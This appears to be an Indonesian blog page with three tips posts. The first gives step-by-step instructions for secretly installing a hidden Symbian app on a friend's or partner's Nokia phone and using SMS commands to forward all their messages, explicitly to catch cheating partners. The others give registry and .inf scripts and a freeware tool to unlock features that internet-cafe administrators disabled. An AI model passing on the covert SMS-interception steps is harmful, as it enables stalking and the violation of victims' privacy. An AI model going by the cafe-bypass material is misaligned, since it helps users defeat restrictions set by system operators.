Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

Masukkan aplikasi symbian itu di HP anda dan teman anda
Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
Siapkan hp/ponsel korban anda
Siapkan HP anda yang akan menerima sms masuk dari korban anda.
Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga membantu....

Bisa Download di Sini

»» READMORE...

Membuka RegEdit Yang Terkunci

1. CARA PERTAMA

Adakalanya untuk men-unlock registry yang terkunci, kita membuat file *.reg dengan script berikut:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Simpan dengan nama terserah.reg dan jalankan.. maka registry editor anda akan ter un-lock. Namun pada beberapa kasus, regsitry editor tetap terkunci. Ada beberapa kemungkinan:

Ada file *.reg lain yang berisi file script serupa di direktory lain, dan dalam script "lain" tersebut value DisableRegistryTools = 1 Hal ini kerap kali terjadi pada WIN-ME

Ada aplikasi lain yang sedang memproteksi komputer yang sedang anda hadapi yang mendisable penggunaan file-file dengan ekstensi *.reg ---> kerap kali dijumpai di warnet-warnet.

Jika memang demikian, ada alternatif lain yang bisa anda lakukan. Coba script berikut:

2. CARA KEDUA

[Version]
Signature="$Chicago$"
Provider=Symantec

[DefaultInstall]
AddReg=UnhookRegKey

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,0x00000020,0

Simpan dengan nama terserah anda.inf Setelah terbentuk file *.inf, klik kanan pada file tersebut dan pilih [instal]. Sekarang coba buka registry anda dan tara... regedit yang manis pun terbuka dengan sepenuh hati.

3. Cara Ketiga Yaitu dengan Mendownload Buka Fitur

»» READMORE...

Warnet Hacking

Buka Fitur atau yang lebih dikenal dengan nama Warnet Hacking adalah sebua freeware yang mana kita bisa membuka fitur fitur yang sengaja di disable seperti

-. System Registry
-. Menampilkan Menu RUN
-. Menampilkan Find/Seacrh
-. Mengaktifkan Internet Option IE
-. Mengaktifkan Folder Option
-. Mengaktifkan Pengaturan Display
-. Mengaktifkan Klik Kanan Di Destop
-. Mengaktifkan Kilik Kanan Di TaskBar
-. Tampilkan Semua Item Destop
-. Tampilkan Menu ShutDown
-. Aktifkan Menu Control Panel
-. Tampilkan Menu Go Internet Explorer
-. Tampilkan System Restore Windows XP
-. Tampilkan Semua Driver (Lokal Disk)
-. Mengaktifkan Command Promt

Pokoknya Keren Abis..
Bisa Digunakan Di warnet yang selalu mempatasi pelangganya untuk lebi leluasa mengenal komputer

Download di sini

»» READMORE...